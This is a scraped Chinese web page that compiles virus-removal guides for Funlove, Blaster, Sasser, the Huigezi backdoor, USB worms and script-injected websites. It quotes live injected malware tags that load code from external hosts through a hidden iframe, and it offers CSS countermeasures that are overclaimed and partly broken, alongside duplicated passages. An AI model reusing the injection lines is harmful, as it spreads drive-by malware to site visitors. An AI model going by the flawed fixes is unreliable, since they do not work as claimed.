如何写论文?写好论文?免费论文网提供各类免费论文写作素材!
当前位置:免费论文网 > 美文好词 > 优质好文 > 电脑病毒解决方法

电脑病毒解决方法

来源:免费论文网 | 时间:2017-05-03 06:15 | 移动端:电脑病毒解决方法

篇一:常见病毒解决方案大全

常见病毒解决方案大全!

1)Funlove病毒

病毒的全称是:Win32.Funlove.4608(4099),属于文件型病毒。

病毒特征:会在Windows的system(NT系统中为System32)目录下建立flcss.exe,长度为4068字节.搜索所有本地驱动器以及局域网上的共享文件夹,在其中搜索带有EXE,Scrocx扩展名的文件,验证后进行感染。

预防与清除:

1、 网络用户在清除该病毒时,首先要将网络断开。

2、 然后用软盘引导系统,用单机版杀毒软件对每一台工作站分别进行病毒的清除工作。

3、 对于单机用户直接从第二步开始。

4、 若服务器端染毒funlove病毒的,且使用NTFS格式,用DOS系统盘启动后,找不到硬盘,则需将染毒的硬盘拆下,放到另外一个干净的Windows NT/2000系统下作为从盘,然后用无毒的主盘引导机器后,使用主盘中安装的杀毒软件再对从盘进行病毒检测、清除工作。

5、 确认各个系统全部清除病毒后,在服务器和个工作站安装防病毒软件,同时启动实时监控系统,恢复正常工作。

2)冲击波病毒

以下操作除非指定,一律在无活动网络连接的环境下进行

1、 在任务管理器中,结束"msblast.exe"进程。

2、 进入windows文件夹system目录,删除msblaster.exe

3、 通过在任务栏运行中输入msconfig,删除一个windows update的启动程序

4、进入“管理工具”文件夹(在开始菜单或控制面板),运行组件服务,在左边侧栏点击“服务(本地)”,找到Remote Procedure Call (RPC),其描述为“提供终结点映射程序 (endpoint mapper) 以及其它 RPC 服务。”。双击它,进入恢复标签页,把第一二三次操作都设为“不操作”

5、还在组件服务中,在左边侧栏点击“组件服务”,双击右边的计算机,在出现的我的电脑上右键点击,进入属性,点击“默认属性”,关闭分布式COM。

6、在防火墙设置中关闭135,4444,66端口。(如果没有安装防火墙,用XP自带的也行)

7、重启后,打开防火墙!下载微软补丁并安装。再重启,搞定!

3)震荡波

1、“震荡波”利用WINDOWS平台的Lsass漏洞进行广泛传播,开启上百个线程不停攻击其它网上其它系统,堵塞网络。并不通过邮件传播,而是通过命令易受感染的机器下载特定文件并运行,来达到感染的目的.

2、如何判别感染"震荡波"

①、莫名其妙地死机或重新启动计算机。

②任务管理器里有"avserve.exe"或者“avserve2.exe”、*_up.exe(*为随即数字)的进程在运行。

③、在windows目录下,产生一个名为avserve.exe或者avserve2.exe的病毒文件;

在windows\system32下产生几个*_up.exe文件。

④最系统速度极慢,cpu占用100% 。

2、解决方法:

①、首先断开网。

②、手动删除windows目录下名为avserve.exe或者avserve2.exe的病毒文件;删除windows\system32下*_up.exe文件。

删除注册表

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run中有关avserve.exe或者avserve2.exe的键值。

WIN2000补丁:

WINXP补丁:

WIN2003补丁:

4)“新欢乐时光”病毒的主要表现是:

一、每个检查到的文件夹下生成“desktop.ini”和“folder.htt”文件;

二、在注册表

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\下生成“Kernel32”键值,并指向“Kernel.dll”或者“Kernel32.dll”文件;

三、在system目录下生成“kjwall.gif”文件。

手工清除的方法如下:

1)打开注册表,删除

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Kernel32键值;

2) 对照其它没中毒的电脑,恢复 HKEY_CLASSES_ROOT\\dllFile\\下的键值;

3)对照其它电脑,恢复 HKEY_CURRENT_USER\\Identities\\" &UserID& "\\Software\\Microsoft\\Outlook Express\\" &OEVersion&"\\Mail\\下的相关键值;

4)对照其它电脑,恢复

HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\9.0\\Outlook\\Options\\Mail\\下的相关键值;

5)对照其它电脑,恢复

HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\10.0\\Outlook\\Options\\Mail\\下的相关键值;

删除带毒文件(建议在 DOS 状态下进行)

1)对照其它电脑,恢复Windows\\web目录下“folder.htt”文件;

2)删除“Kernel32.dll”或“Kernel.dll”文件;

3)删除“kjwall.gif”;

4)查找所有带有“KJ_start”字符串的文件,并删除文件尾部的病毒代码。

5)灰鸽子病毒的主要表现

灰鸽子(Backdoor.Huigezi)作者现在还没有停止对灰鸽子的开发,再加上有些人为了避开杀毒软件的查杀故意给灰鸽子加上各种不同的壳,造成现在网络上不断有新的灰鸽子变种出现。尽管瑞星公司一直在不遗余力地收集最新的灰鸽子样本,但由于变种繁多,还会有一些“漏网之鱼”。如果您的机器出现灰鸽子症状但用瑞星杀毒软件查不到,那很可能是中了还没有被截获的新变种。这个时候,就需要手工杀掉灰鸽子。

手工清除灰鸽子并不难,重要的是我们必须懂得它的运行原理。

灰鸽子的运行原理:

灰鸽子木马分两部分:客户端和服务端。黑客(姑且这么称呼吧)操纵着客户端,利用客户端配置生成出一个服务端程序。服务端文件的名字默认为G_Server.exe,然后黑客通过各种渠道传播这个木马(俗称种木马或者开后门)。种木马的手段有很多,比如,黑客可以将它与一张图片绑定,然后假冒成一个羞涩的MM通过QQ把木马传给你,诱骗你运行;也可以建立一个个人网页,诱骗你点击,利用IE漏洞把木马下载到你的机器上并运行;还可以将文件上传到某个软件下载站点,冒充成一个有趣的软件诱骗用户下载??

G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录,2k/NT下为系统盘的Winnt目录),然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。G_Server.exe、G_Server.dll和

G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端,有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。注意,G_Server.exe这个名称并不固定,它是可以定制的,比如当定制服务端文件名为A.exe时,生成的文件就是A.exe、A.dll和A_Hook.dll。

Windows目录下的G_Server.exe文件将自己注册成服务(9X系统写注册表启动项),每次开机都能自动运行,运行后启动G_Server.dll和G_Server_Hook.dll并自动退出。G_Server.dll文件实现后门功能,与控制端客户端进行通信;G_Server_Hook.dll则通过拦截API调用来隐藏病毒。因此,中毒后,我们看不到病毒文件,也看不到灰鸽子(Backdoor.Huigezi)作者现在还没有停止对灰鸽子的开发,再加上有些人为了避开杀毒软件的查杀故意给灰鸽子加上各种不同的壳,造成现在网络上不断有新的灰鸽子变种出现。尽管瑞星公司一直在不遗余力地收集最新的灰鸽子样本,但由于变种繁多,还会有一些“漏网之鱼”。如果您的机器出现灰鸽子症状但用瑞星杀毒软件查不到,那很可能是中了还没有被截获的新变种。这个时候,就需要手工杀掉灰鸽子。

手工清除灰鸽子并不难,重要的是我们必须懂得它的运行原理。

灰鸽子的手工检测:

由于灰鸽子拦截了API调用,在正常模式下木马程序文件和它注册的服务项均被隐藏,也就是说你即使设置了“显示所有隐藏文件”也看不到它们。此外,灰鸽子服务端的文件名也是可以自定义的,这都给手工检测带来了一定的困难。 但是,通过仔细观察我们发现,对于灰鸽子的检测仍然是有规律可循的。从上面

的运行原理分析可以看出,无论自定义的服务器端文件名是什么,一般都会在操作系统的安装目录下生成一个以“_hook.dll”结尾的文件。通过这一点,我们可以较为准确手工检测出灰鸽子木马。

由于正常模式下灰鸽子会隐藏自身,因此检测灰鸽子的操作一定要在安全模式下进行。进入安全模式的方法是:启动计算机,在系统进入Windows启动画面前,按下F8键(或者在启动计算机时按住Ctrl键不放),在出现的启动选项菜单中,选择“Safe Mode”或“安全模式”。

1) 由于灰鸽子的文件本身具有隐藏属性,因此要设置Windows显示所有文件。打开“我的电脑”,选择菜单“工具”―》“文件夹选项”,点击“查看”,取消“隐藏受保护的操作系统文件”前的对勾,并在“隐藏文件和文件夹”项中选择“显示所有文件和文件夹”,然后点击“确定”。

2)打开Windows的“搜索文件”,文件名称输入“_hook.dll”,搜索位置选择Windows的安装目录(默认98/xp为C:\windows,2k/NT为C:\Winnt)。

3)打开Windows的“搜索文件”,文件名称输入“_hook.dll”,搜索位置选择Windows的安装目录(默认98/xp为C:\windows,2k/NT为C:\Winnt)。

4)根据灰鸽子原理分析我们知道,如果Game_Hook.DLL是灰鸽子的文件,则在操作系统安装目录下还会有Game.exe和Game.dll文件。打开Windows目录,果然有这两个文件,同时还有一个用于记录键盘操作的GameKey.dll文件。

篇二:最简单的系统木马病毒解决方法

最简单的系统木马病毒解决方法

系统中木马病毒后该怎么办?下面我们介绍一些简单的解决方法。

1.打开windows任务管理器,察看是否有可疑的进程(可以根据杀毒软件的报告或者在网上搜索相关信息来判定)在运行,如果有把它结束。注意在system32目录下的Rundll32.exe本身不是病毒,有可能一个dll文件在运行,他才可能是病毒或恶意程序之类的东西。 由于windows 任务管理器不能显示进程的路径,因此建议使用杀毒软件自带的进程察看和管理工具来查找并中止可疑进程。然后设法找到病毒程序文件(主要是你所中止的病毒进程文件,另外先在资源管理器的文件夹选项中,设置显示所有文件和文件夹、显示受保护的文件,再察看如system32文件夹中是否有不明dll或exe文件,C:\Program Files、C:\Documents and Settings\user\Local Settings\Temporary Internet Files、C:\Documents and Settings\user\Local Settings\Temp等处是否有不明文件或病毒程序文件),然后删去,搞清楚是否是系统文件再动手。

2.有些病毒进程终止不了,提示“拒绝访问”,或者出现“屡禁不止”的情况。根据我的经验,有三种办法供尝试:

A.可能是某些木马病毒、流氓软件等注册为系统服务了。办法是:察看控制面板〉管理工具〉服务,看有没有与之相关的服务(特别是“描述”为空的)在运行,把它停止。再试著中止病毒进程并删除。

B.你可以尝试安全模式下(开机后按F8选安全模式)用杀毒软件处理,不行则再按步骤1和2A试一试。

C.使用冰刃等工具,察看病毒进程的线程信息和模块信息,尝试结束线程和解除模块,再试著删除病毒进程文件和相应的模块。(慎用)

3.如果稍微懂得注册表使用的,可以再把相关的注册表键值删除。一般方法:开始〉运行,输入regedit,确定,打开注册表编辑器。编辑〉查找,查找目标为病毒进程名,在搜索结果中将与之有关的键值删除。有时这样做不能遏止病毒,还应尝试使用步骤2中方法。

4.某些病毒会劫持IE浏览器,导致乱弹网页的状况。建议用360安全卫士,看浏览器辅助对象BHO是否有可疑项目,有没有没恶意插件或者木马。有就修复它。

5.其他提示:为了更好的操作,请先用优化大师或超级兔子清理所有临时文件和上网时的缓存文件。一般病毒往往在临时文件夹Temp中,这样做可以帮你更快找到病毒文件。 开始>>运行,输入msconfig,确定,可以打开“系统配置实用程序”。选择“启动”,察看开机时加载的程序,如果在其中发现病毒程序,可以禁止它在开机时加载。不过此法治标不治本,甚至对某些程序来说无效。还是要按步骤1、2办。

2009-03-06 17:01

网站被挂木马解决方法

参考网站:/viewthread.php?tid=428347

还是挂马问题,这段时间,我渐渐感到压力,头大,通过QQ或MSN加我的人越来越多,我最近自己的工作本来就忙得不亦乐乎。哎,想想,还是要抽空来来帮一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)》得到了很多朋友的认可,这确实是个避避风雨的好办法。可现在挂网马的方式真如我所料地改变了,现在流行挂<script>木马,汗了,看了几个网友的网站都被这样了——页面的顶部或底部加上了:

注意,以下地址含有木马,请不要轻易访问:

<script src=http://%76%63%63%64%2E%63%6E></script>

<script src=http://%76%63%63%64%2E%63%6E></script>

<script src=http://%76%63%63%64%2E%63%6E></script>

<script src=http://%76%63%63%64%2E%63%6E></script>

<script src=http://%76%63%63%64%2E%63%6E></script>

<script src=http://%76%63%63%64%2E%63%6E></script>

<script src=http://%76%63%63%64%2E%63%6E></script>

<script src=http://%76%63%63%64%2E%63%6E></script>

汗死,一连插入了N个一样的<script>标记。偶的电脑什么补丁都打了,直接访问这个http://%76%63%63%64%2E%63%6E(或直接使用迅雷下载),额~ 现形了: document.write("<div style='display:none'>")

document.write("<iframe src=http://a.158dm.com/b1.htm?id=017 width=0 height=0></iframe>")

document.write("</div>")

又用迅雷下载http://a.158dm.com/b1.htm这个文件,一看,乱七八糟的JS编码,汗,不过找到了一个类似QQ号的数字,直接加加看,汗,然后是专业提供网马的组织,哎,什么世道。还收费蛮高滴呢!

...

var Kfqq, Qqs="[color=Magenta]784378237[/color]";

qwfgsg="LLLL\\XXXXXLD"; Kfqq = Qqs;

(...略)(下面还有N个统计的JS代码)

针对上面的情况,我也不能白白瞧着不管,想想办法吧,兄弟。喝了碗绿豆粥,糖放得蛮多的,好喝。办法想到了。稍微分析就得出了答案。大家来看看,<script>木马的特点是什么:

<script src=http://%76%63%63%64%2E%63%6E></script>

对了,script木马的src一般都是外域的,也就是src是以http打头的,如果是自己网站的script一般都不用加上http;再看看木马的原形,里面还是输出的iframe、JS代码或是其他<object>代码,不管这么多,来多少杀多少。 来跟我写CSS,一一搞定它们,我写了5种不同的方案,大家来测试一下哈: 解决方案1:

iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*这行代码是解决挂IFRAME木马的哦*/

script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木马被成功隔离!'):'');}

原理:将<script>标记的src拿出来转为小写,再看是不是以“http”开头的外域JS脚本文件,如果是,则页面内容清空并写出“木马被成功隔离!”。反之正常显示。

缺点:访客无法看到被感染了<script>木马的页面。

解决方案2:

iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');} script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');}

原理:将外域的JS文件的document.write()使用document.close()强制关闭。木马内容还没有来得及写完,只有部分被强制缓存输出了,剩下的不会再写了。 解决方案3:

iframe{ni3fm:expression(this.src='about:blank',this.outerHTML='');} script{n3ojs:expression((this.src.toLowerCase().indexOf('http')==0)?document.execCommand('stop'):'');}

原理:同到外域的JS文件,立即调用IE私有的execCommand方法来停止页面所有请求,所以接下来的外域JS文件也被强制停止下载了。就像我们点了浏览器的“停止”按钮一样。看来这是JS模拟IE停止按钮的一种方法。

解决方案4:

iframe{nif4m:expression(this.src='about:blank',this.outerHTML='');} script{noj4s:expression(if(this.src.indexOf('http')==0)this.src='res://ieframe.dll/dnserror.htm');}

原理:将外域的JS文件的src重写成本地IE404错误页面的地址,这样,外域的JS代码不会下载。

解决方案5:

iframe{nifm5:expression(this.src='about:blank',this.outerHTML='');} script{noj5s:expression((this.id.toLowerCase().indexOf('vok')!=-1)?document.write('木马被成功隔离!'):''));}

第五种方案的页面HTML源代码<script>中要加入以"lh"为前缀的id,如

lhWeatherJSapi,<script src="***/**.js" id="lhSearchJSapi"></script> 以下页面代码里含有一个木马地址,而且木马在页面里重复了6次,大家分别用我上面的不同方案测试一下,看看我的研究如何!(此测试有一定的危险性,请务必打好所有补丁再测试)www.ght.cc电影王国

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "/images/logo.gif' />"); 我的测试环境是:

Windows XP SP2 和windows Vista SP1

IE6/IE7/IE8

已全部打好补丁。

综上所述,所有目前的挂马方式全都破解了,用CSS就可以解决所有木马问题,访客不会再轻易地中毒了。

以后也要再仔细研究一下,看看我的代码有什么BUG,有的话一定要解决问题!

6.说了这么多,不过有时还是不能解决。只好请教高人或格式化重做系统了,当然不推荐后者。

篇三:exe病毒解决方法

清除文件夹后缀名为exe的病毒

一:一位朋友的U盘给感染了,表现症状是所有文件夹有后缀exe,大小依照不同的变种不一样,都是几百kb的。病毒的作者用的是伪装术,你所看到的文件夹并不是真正的文件夹,而是病毒文件,只是把图标改成了文件夹的样式,刚开始我也给中招了。而真正的文件夹是被隐藏了,所以双击的时候实际是执行了病毒文件,然后病毒会隐藏所有的文件夹。病毒的进程是什么,粗略的看了下好像是伪装成issas.exe,可以结束掉该进程后再杀毒。

1.运行→输入“cmd”,回车,进入cmd.

2.cd x:(x是U盘盘符)。

3.attrib -s -h -r /s /d

之后就会发现被隐藏的文件夹,然后删除掉所有同名的但是有后缀的文件夹。同时还生成一个recycle的文件夹,也直接删掉。如果清楚之后发现又生成了,说明病毒还在运行,继续查找可疑进程,结束之后再按照上述步骤清楚。最后拿杀毒软件杀下毒,以防止病毒是文件感染的。

二:第二拷回文件后,发现我的u盘上文件的名称后缀都变成了exe,我的盘中毒了,由于这种事对于我来说是第一次发生,感到比较紧张,马上用瑞星杀了毒,令我不解的是,杀完毒后,u盘上所剩文件无几,但所占空间并没有改变,我想可能是文件被隐藏了,于是我通过工具中的文件夹选项把文件显示了出来,但是文件属性中的隐藏为灰色,总不能每次都要通过这种方法来显示隐藏文件吧,怎么解决这个问题呢?我找到了以下解决途径:1,运用u盘病毒专杀工具,如U盘病毒专杀工具USBCLeaner 它可以修改被病毒隐藏的文件属性,并能杀掉u盘病毒。USBCleaner是一种纯 绿色的辅助杀毒工具,具有检测查杀70余种U盘病毒,U盘病毒广谱扫描,U盘病毒免疫,修复显示隐藏文件及系统文件,安全卸载移动盘盘符等功能,全方位一 体化修复杀除U盘病毒.同时USBCleaner能迅速对新出现的U盘病毒进行处理.USBCleaner是你学习,工作,娱乐的好帮手。 2,先要用杀毒软件把病毒给杀了。在“开始——运行”在里面输入cmd,打开系统的命令提示符,在里面输入盘符,进入需要修改的优盘,相关设置如下: C:\Documents and Settings\Administrator>J://进入J盘(优盘)目录

j:\>dir/a //这个指令是查看当前目录全部的文件.包括有隐藏属性的

J:\>attrib 文件夹的名字 -r -h -s /s /d

就可以显示了,“文件夹的名字”就是当 前优盘下的隐藏的文件夹的名字,没有后缀名,如果是多个文件夹要恢复显示状态的话,在命令提示符可以通过小键盘那的上下箭头健来选择

J:\>attrib 文件夹的名字 -r -h -s /s /d 把文件夹名字该了就行了

如果不是文件夹,而是其他的程序,可以输入这样的命令:

j:\>attrib *.* -r -h -s /s /d

3,打开“记事本”,复制如下内容:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]

"CheckedValue"=dword:00000001

保存文件名:“显示被隐藏的文件.REG”,(确保在“文件夹选项”中去掉“隐藏已知文件类型的扩展名”),双击运行此文件,再重新到“文件夹选项”中设置显示隐藏文件。

4,把下面一行代码复制到记事本,保存为 取消隐藏文件.bat , 然后双击运行它即可。

for /f "delims=" %%i in ('dir /ah /s/b') do attrib "%%i" -s -h

命令的意思解释:

for /f "delims=" %%i in 循环

dir /s显示当前目录及子目录中所有文件

参数 /ah具有隐藏属性的文件

参数 /b用短文件名的方式显示

do attrib "%%i" -s -h 取消这个文件/文件夹的 系统属性 隐藏属性

5,通过注册表修改隐藏属性

6,把隐藏文件夹通过工具中的文件夹选项显示出来,然后将文件夹中的内容复制,放到在重新建的文件夹中去,再把原来的文件夹删掉,就ok了,首先要把U盘中的毒杀掉哦。

三:下面的方法有点烦,我都懒得看的。你们觉得喜欢哪个就用那个吧!

1.打开任务管理器,把用户进程(进程分为:用户,system,local service,network service)下除ctfmon.exe,exploer.exe,

其他全部结束进程,如果任务管理器打不开:开始--运行--CMD(如果CMD再无法使用,那只有重新安装系统)--tasklist把除了上面所说的,

还有

smss.exe,csrss.exe,svchost.exe,alg.exe,services.exe,winlogon.exe,tasklist.exe,system,system idle process,lsass.exe,

conime.exe,其他进程都尝试结束掉(比如结束QQ.exe:tskill qq)

2.开始--运行--msconfig

把CTFMON和杀毒软件项,其他都禁用掉。

3.开始--运行--regedit,打开到:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL

把CheckedValue项的数值改为1,要注意,该项是蓝色的,如果是红色的,就删除CheckedValue项,然后新建DWORD值,

名为CheckedValue ,里面的数值该为1。(该操作是修复病毒修改过的注册表数值,不然下面的操作无法显示隐藏文件)

4.打开文件夹选项--查看--·显示隐藏的操作系统文件和文件夹·,显示所有文件和文件夹,然后确定,右击硬盘,

选下面的·打开·,千万不要双击,否则病毒自动运行。此时你就能看到你原来的文件了,

然后删除autorun.inf以及一个.exe的病毒文件,每个硬盘根目录下面都有。

5.修改注册表:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

把NoDriveTypeAutoRun的值改为ff

这样操作是关闭所有驱动器的自动运行,也就是不让病毒auto

6.重新启动电脑

四:这是典型的杀毒后遗症,原因是木马关联了exe(也就是说你打开任何以后缀名exe的执行文件都会使木马运行)所以你查杀木马后就达不开exe文件了。你可以这样修复:

解决方法:对于exe打开方式被木马或病毒修改,无法打开任何可执行文件的解决办法。

方案一:先将regedit.exe改名为regedit.com或regedit.scr。

运行regedit.com,找到hkey_classes_root\exefile\shell\Open\command键值,将默认值改为%1 %*重启,再将regedit.com改回regedit.exe即可。

方案二:将下面的内容存为exefile.reg,双击导入注册表;或在纯dos下运行regedit exefile.reg,导入注册表即可。(注意:regedit4后面留一空行) regedit4

[hkey_classes_root\exefile\shell\Open\command]

@=\%1\ %*

方案三(只适用于win2000/xp):

1、将cmd.exe改名为cmd.com或cmd.scr。

2、运行cmd.com

3、运行下面两个命令:ftype exefile=%1 %*assoc .exe=exefile

4、将cmd.com改回cmd.exe

五:你中了recycled病毒.把你U盘后缀名为EXE的文件夹全部删掉.把隐藏文件全部还原.再删recycled.exe和autorun.inf两个文件就行了.你的U盘得救了。 用recycled专杀杀你电脑的病毒.


电脑病毒解决方法》由:免费论文网互联网用户整理提供;
链接地址:http://www.csmayi.cn/meiwen/30233.html
转载请保留,谢谢!
相关文章